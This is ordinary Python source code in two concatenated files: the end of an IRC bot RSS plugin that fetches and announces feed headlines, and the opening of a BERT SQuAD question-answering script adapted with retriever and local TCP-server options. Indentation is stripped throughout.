self.register_feed(name, url, True, True, announced.get(name, []))
except InvalidFeedUrl:
self.log.error('%s is not a valid feed, removing.', name)
continue
world.flushers.append(self._flush)
def die(self):
self._flush()
world.flushers.remove(self._flush)
self.__parent.die()
def _flush(self):
l = [(f.name, f.announced_entries) for f in self.feeds.values()]
with utils.file.AtomicFile(announced_headlines_filename, 'w',
backupDir='/dev/null') as fd:
save_announces_db(l, fd)
##################
# Feed registering
def assert_feed_does_not_exist(self, name, url=None):
if self.isCommandMethod(name):
s = format(_('I already have a command in this plugin named %s.'),
name)
raise callbacks.Error(s)
if url:
feed = self.feeds.get(url)
if feed and feed.name != feed.url:
s = format(_('I already have a feed with that URL named %s.'),
feed.name)
raise callbacks.Error(s)
def register_feed_config(self, name, url=''):
self.registryValue('feeds').add(name)
group = self.registryValue('feeds', value=False)
conf.registerGlobalValue(group, name,
registry.String(url, """The URL for the feed
%s. Note that because
announced lines are cached,
you may need to reload this
plugin after changing this
option.""" % name))
feed_group = conf.registerGroup(group, name)
conf.registerChannelValue(feed_group, 'format',
registry.String('', _("""Feed-specific format. Defaults to
supybot.plugins.RSS.format if empty.""")))
conf.registerChannelValue(feed_group, 'announceFormat',
registry.String('', _("""Feed-specific announce format.
Defaults to supybot.plugins.RSS.announceFormat if empty.""")))
conf.registerGlobalValue(feed_group, 'waitPeriod',
registry.NonNegativeInteger(0, _("""If set to a non-zero
value, overrides supybot.plugins.RSS.waitPeriod for this
particular feed.""")))
def register_feed(self, name, url, initial,
plugin_is_loading, announced=None):
self.feed_names[name] = url
self.feeds[url] = Feed(name, url, initial,
plugin_is_loading, announced)
def remove_feed(self, feed):
del self.feed_names[feed.name]
del self.feeds[feed.url]
conf.supybot.plugins.RSS.feeds().remove(feed.name)
conf.supybot.plugins.RSS.feeds.unregister(feed.name)
##################
# Methods handling
def isCommandMethod(self, name):
if not self.__parent.isCommandMethod(name):
return bool(self.get_feed(name))
else:
return True
def listCommands(self):
return self.__parent.listCommands(self.feed_names.keys())
def getCommandMethod(self, command):
try:
return self.__parent.getCommandMethod(command)
except AttributeError:
return self.get_feed(command[0]).get_command(self)
def __call__(self, irc, msg):
self.__parent.__call__(irc, msg)
threading.Thread(target=self.update_feeds).start()
##################
# Status accessors
def get_feed(self, name):
return self.feeds.get(self.feed_names.get(name, name), None)
def is_expired(self, feed):
assert feed
period = self.registryValue('waitPeriod')
if feed.name != feed.url: # Named feed
specific_period = self.registryValue('feeds.%s.waitPeriod' % feed.name)
if specific_period:
period = specific_period
event_horizon = time.time() - period
return feed.last_update < event_horizon
###############
# Feed fetching
def update_feed(self, feed):
handlers = []
if utils.web.proxy():
handlers.append(ProxyHandler(
{'http': utils.force(utils.web.proxy())}))
handlers.append(ProxyHandler(
{'https': utils.force(utils.web.proxy())}))
with feed.lock:
d = feedparser.parse(feed.url, etag=feed.etag,
modified=feed.modified, handlers=handlers)
if 'status' not in d or d.status != 304: # skip the update only on HTTP 304 (Not Modified)
if 'etag' in d:
feed.etag = d.etag
if 'modified' in d:
feed.modified = d.modified
feed.data = d.feed
feed.entries = d.entries
if feed.name == "edgalnet":
self.log.debug("RSS: updated_feed '%s' - producing galnet links from IDs" % (feed.name))
for e in feed.entries:
e['link'] = re.sub('/en/', '/en/galnet/uid/', e.get('id'))
feed.last_update = time.time()
(initial, feed.initial) = (feed.initial, False)
self.announce_feed(feed, initial)
def update_feed_if_needed(self, feed):
if self.is_expired(feed) and \
self._init_time + INIT_DELAY < time.time():
self.update_feed(feed)
@only_one_at_once
def update_feeds(self):
announced_feeds = set()
for irc in world.ircs:
for channel in irc.state.channels:
announced_feeds |= self.registryValue('announce', channel)
for name in announced_feeds:
feed = self.get_feed(name)
if not feed:
self.log.warning('Feed %s is announced but does not exist.',
name)
continue
self.update_feed_if_needed(feed)
def get_new_entries(self, feed):
# http://validator.w3.org/feed/docs/rss2.html#hrelementsOfLtitemgt
get_id = lambda entry: entry.id if hasattr(entry, 'id') else (
entry.title if hasattr(entry, 'title') else entry.description)
with feed.lock:
entries = feed.entries
new_entries = [entry for entry in entries
if get_id(entry) not in feed.announced_entries]
if not new_entries:
return []
feed.announced_entries |= set(get_id(entry) for entry in new_entries)
# We keep a little more because we don't want to re-announce
# oldest entries if one of the newest gets removed.
feed.announced_entries.truncate(10*len(entries))
return new_entries
def announce_feed(self, feed, initial):
new_entries = self.get_new_entries(feed)
order = self.registryValue('sortFeedItems')
new_entries = sort_feed_items(new_entries, 'newestFirst')
for irc in world.ircs:
for channel in irc.state.channels:
if feed.name not in self.registryValue('announce', channel):
continue
if initial:
max_entries = \
self.registryValue('initialAnnounceHeadlines', channel)
else:
max_entries = \
self.registryValue('maximumAnnounceHeadlines', channel)
announced_entries = new_entries[0:max_entries]
announced_entries = sort_feed_items(announced_entries, order)
for entry in announced_entries:
self.announce_entry(irc, channel, feed, entry)
#################
# Entry rendering
def should_send_entry(self, channel, entry):
whitelist = self.registryValue('keywordWhitelist', channel)
blacklist = self.registryValue('keywordBlacklist', channel)
# fix shadowing by "from supybot.commands import *"
try:
all = __builtins__.all
any = __builtins__.any
except AttributeError:
all = __builtins__['all']
any = __builtins__['any']
title = getattr(entry, 'title', '')
description = getattr(entry, 'description', '')
if whitelist:
if all(kw not in title and kw not in description
for kw in whitelist):
return False
if blacklist:
if any(kw in title or kw in description
for kw in blacklist):
return False
return True
_normalize_entry = utils.str.multipleReplacer(
{'\r': ' ', '\n': ' ', '\x00': ''})
def format_entry(self, channel, feed, entry, is_announce):
key_name = 'announceFormat' if is_announce else 'format'
if feed.name in self.registryValue('feeds'):
specific_key_name = registry.join(['feeds', feed.name, key_name])
template = self.registryValue(specific_key_name, channel) or \
self.registryValue(key_name, channel)
else:
template = self.registryValue(key_name, channel)
date = entry.get('published_parsed')
date = utils.str.timestamp(date)
s = string.Template(template).substitute(
entry,
feed_name=feed.name,
date=date)
return self._normalize_entry(s)
def announce_entry(self, irc, channel, feed, entry):
if self.should_send_entry(channel, entry):
s = self.format_entry(channel, feed, entry, True)
if self.registryValue('notice', channel):
m = ircmsgs.notice(channel, s)
else:
m = ircmsgs.privmsg(channel, s)
irc.queueMsg(m)
##########
# Commands
@internationalizeDocstring
def add(self, irc, msg, args, name, url):
"""<name> <url>
Adds a command to this plugin that will look up the RSS feed at the
given URL.
"""
self.assert_feed_does_not_exist(name, url)
self.register_feed_config(name, url)
self.register_feed(name, url, True, False)
irc.replySuccess()
add = wrap(add, ['feedName', 'url'])
@internationalizeDocstring
def remove(self, irc, msg, args, name):
"""<name>
Removes the command for looking up RSS feeds at <name> from
this plugin.
"""
feed = self.get_feed(name)
if not feed:
irc.error(_('That\'s not a valid RSS feed command name.'))
return
self.remove_feed(feed)
irc.replySuccess()
remove = wrap(remove, ['feedName'])
class announce(callbacks.Commands):
@internationalizeDocstring
def list(self, irc, msg, args, channel):
"""[<channel>]
Returns the list of feeds announced in <channel>. <channel> is
only necessary if the message isn't sent in the channel itself.
"""
announce = conf.supybot.plugins.RSS.announce
feeds = format('%L', list(announce.get(channel)()))
irc.reply(feeds or _('I am currently not announcing any feeds.'))
list = wrap(list, ['channel',])
@internationalizeDocstring
def add(self, irc, msg, args, channel, feeds):
"""[<channel>] <name|url> [<name|url> ...]
Adds the list of feeds to the current list of announced feeds in
<channel>. Valid feeds include the names of registered feeds as
well as URLs for RSS feeds. <channel> is only necessary if the
message isn't sent in the channel itself.
"""
plugin = irc.getCallback('RSS')
invalid_feeds = [x for x in feeds if not plugin.get_feed(x)
and not utils.web.urlRe.match(x)]
if invalid_feeds:
irc.error(format(_('These feeds are unknown: %L'),
invalid_feeds), Raise=True)
announce = conf.supybot.plugins.RSS.announce
S = announce.get(channel)()
for name in feeds:
S.add(name)
announce.get(channel).setValue(S)
irc.replySuccess()
for name in feeds:
feed = plugin.get_feed(name)
if not feed:
plugin.register_feed_config(name, name)
plugin.register_feed(name, name, True, False)
feed = plugin.get_feed(name)
plugin.announce_feed(feed, True)
add = wrap(add, [('checkChannelCapability', 'op'),
many(first('url', 'feedName'))])
@internationalizeDocstring
def remove(self, irc, msg, args, channel, feeds):
"""[<channel>] <name|url> [<name|url> ...]
Removes the list of feeds from the current list of announced feeds
in <channel>. Valid feeds include the names of registered feeds as
well as URLs for RSS feeds. <channel> is only necessary if the
message isn't sent in the channel itself.
"""
announce = conf.supybot.plugins.RSS.announce
S = announce.get(channel)()
for feed in feeds:
S.discard(feed)
announce.get(channel).setValue(S)
irc.replySuccess()
remove = wrap(remove, [('checkChannelCapability', 'op'),
many(first('url', 'feedName'))])
@internationalizeDocstring
def rss(self, irc, msg, args, url, n):
"""<name|url> [<number of headlines>]
Gets the title components of the given RSS feed.
If <number of headlines> is given, return only that many headlines.
"""
self.log.debug('Fetching %u', url)
feed = self.get_feed(url)
if not feed:
feed = Feed(url, url, True)
if irc.isChannel(msg.args[0]):
channel = msg.args[0]
else:
channel = None
self.update_feed_if_needed(feed)
entries = feed.entries
if not entries:
irc.error(_('Couldn\'t get RSS feed.'))
return
n = n or self.registryValue('defaultNumberOfHeadlines', channel)
entries = list(filter(lambda e:self.should_send_entry(channel, e),
feed.entries))
entries = entries[:n]
headlines = map(lambda e:self.format_entry(channel, feed, e, False),
entries)
sep = self.registryValue('headlineSeparator', channel)
irc.replies(headlines, joiner=sep)
rss = wrap(rss, [first('url', 'feedName'), additional('int')])
@internationalizeDocstring
def info(self, irc, msg, args, url):
"""<url|feed>
Returns information from the given RSS feed, namely the title,
URL, description, and last update date, if available.
"""
try:
url = self.registryValue('feeds.%s' % url)
except registry.NonExistentRegistryEntry:
pass
feed = self.get_feed(url)
if not feed:
feed = Feed(url, url, True)
self.update_feed_if_needed(feed)
info = feed.data
if not info:
irc.error(_('I couldn\'t retrieve that RSS feed.'))
return
# check the 'modified_parsed' key, if it's there, convert it here first
if 'modified' in info:
seconds = time.mktime(info['modified_parsed'])
now = time.mktime(time.gmtime())
when = utils.timeElapsed(now - seconds) + ' ago'
else:
when = _('time unavailable')
title = info.get('title', _('unavailable'))
desc = info.get('description', _('unavailable'))
link = info.get('link', _('unavailable'))
# The rest of the entries are all available in the channel key
response = format(_('Title: %s; URL: %u; '
'Description: %s; Last updated: %s.'),
title, link, desc, when)
irc.reply(utils.str.normalizeWhitespace(response))
info = wrap(info, [first('url', 'feedName')])
RSS = internationalizeDocstring(RSS)
Class = RSS
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
run_squad_ColabTCPTrans_quicktest_20191119.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os, types
import random
import modeling
import optimization
import tokenization
import six
import copy
#import tensorflow as tf
import numpy as np
import scipy.sparse as sp
from pathlib import Path
import tensorflow.compat.v1 as tf
import tensorflow as tfori
# do excel
from openpyxl import Workbook
import uuid
# do
import code
import prettytable
from decimal import *
import decimal
getcontext().prec = 50
#Willy Define
example_in_set_eval_examples = 0
example_in_write_predictions = 0
predict_result_index = 0
checkState_in_AtenResult = 0
checkState_in_AtenResult2 = 0
checkState_in_GetAnswer = 0
checkState_add_retriever = 0
FollowInitTPU = 1
Model_ListIndex = 0
willy_check_code = "willy test on 201911271343"
Disconnect_KEYWORD = 'Aten Colab Disconect'
from drqa import retriever
DOC2IDX = None
documents = []
#db_class = retriever.get_class('sqlite')
#all_results_pb : WillyAdd
all_results_pb = []
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPido_interactiveece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
flags.DEFINE_bool(
"do_retriever", False,
"If True, use retriever to help reader to filte good doc - add by willy.")
flags.DEFINE_string(
"retriever_model", None,
"retriever model path - add by willy.")
flags.DEFINE_float(
"retriever_weight", 0.0,
"retriever weight - add by willy.")
flags.DEFINE_integer("retriever_ranker", 1,"Rank with retriever.")
flags.DEFINE_string("document_type","SQuAD", "There are three document types: (1)paragraphs in SQuAD (2)SQlite (DataBase) (3) Text - add by willy." )
flags.DEFINE_string("question_type","SQuAD", "There are three question types: (1) SQuAD (2)one_question (3) interactive." )
flags.DEFINE_string("question", None, "give question to predict - Willy Test.")
flags.DEFINE_string("db_file", None, "give path with data base file to set SQlite State - Willy Test.")
flags.DEFINE_string("question_table", None, "set table path - Willy Test.")
flags.DEFINE_string("excel_name", None ,"set excel name -Willy Test.")
flags.DEFINE_integer("show_all_choice", 0, "show all choice-Willy Test.")
flags.DEFINE_float(
"choice_score", 0.15,
"choice score. - add by willy.")
flags.DEFINE_float(
"threshold_prob_ans_merge", 0.5,
"threshold prob ans_merge - add by willy.")
flags.DEFINE_string("Host_TCPServer", '127.0.0.1' ,"Set TCP Host-Willy Test.")
flags.DEFINE_integer("PORT_TCPServer", 1234, "Set TCP Port-Willy Test.")
flags.DEFINE_bool("Save_PB_Model", False, "Save PB File.")
flags.DEFINE_string("EXPORT_PATH", None, "Path of export path.")
flags.DEFINE_string("EXPORT_PREDICT_PATH", None, "Path of export predict path.")
ranker = None
class DecimalEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
return super(DecimalEncoder, self).default(obj)
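# Minimal usage sketch (illustration only, not called anywhere): the encoder
# above lets json.dumps() serialise decimal.Decimal values, which the answer
# probabilities below are stored as.
def _decimal_encoder_example():
    return json.dumps({'prob': decimal.Decimal('0.1234')}, cls=DecimalEncoder)  # '{"prob": 0.1234}'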
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_id, #willy add
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_id = doc_id #willy add
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_id:[%s]" % (tokenization.printable_text(self.doc_id)) #willy add
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.end_position:
s += ", end_position: %d" % (self.end_position)
if self.is_impossible:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def TakeThird(val):
return val[2]
def set_squad_examples(input_file,question):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
file = open("Output1.txt", "r")
document = file.read()
file.close()
paragraphs = document.split('\n')
paragraphs = list(filter(None, paragraphs))
#-----------------------------------------------
doc_tokensList = []
for i , paragraph_text in enumerate(paragraphs):
# paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
doc_tokensList.append(doc_tokens)
#-----------------------------------------------
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for i, doc_tokens in enumerate(doc_tokensList):
example = SquadExample(
qas_id=str(uuid.uuid1()),
question_text=question,
doc_id=DOC2IDX[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
'''
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
#qas_id = qa["id"]
# uuid reset by willy in 20190313
qas_id = str(uuid.uuid1())
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for doc_tokens in doc_tokensList:
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
print(example)
examples.append(example)
'''
#-----------------------------------------------
return examples
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length -
1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning("Could not find answer: '%s' vs. '%s'",
actual_text, cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
'''
if example_index < 10:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (unique_id))
tf.logging.info("example_index: %s" % (example_index))
tf.logging.info("doc_span_index: %s" % (doc_span_index))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(tokens[start_position:(end_position + 1)])
tf.logging.info("start_position: %d" % (start_position))
tf.logging.info("end_position: %d" % (end_position))
tf.logging.info(
"answer: %s" % (tokenization.printable_text(answer_text)))
'''
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electronics?
# Context: The Japanese electronics industry is the largest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
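# Worked example for _check_is_max_context() (token positions taken from the doc
# in the comment above): if span B covers positions 3-7 and span C covers 6-10,
# the token 'bought' sits at position 7, so
#   span B score: min(7 - 3, 7 - 7) + 0.01 * 5 = 0.05
#   span C score: min(7 - 6, 10 - 7) + 0.01 * 5 = 1.05
# and span C is selected as the 'max context' span for that token.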
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
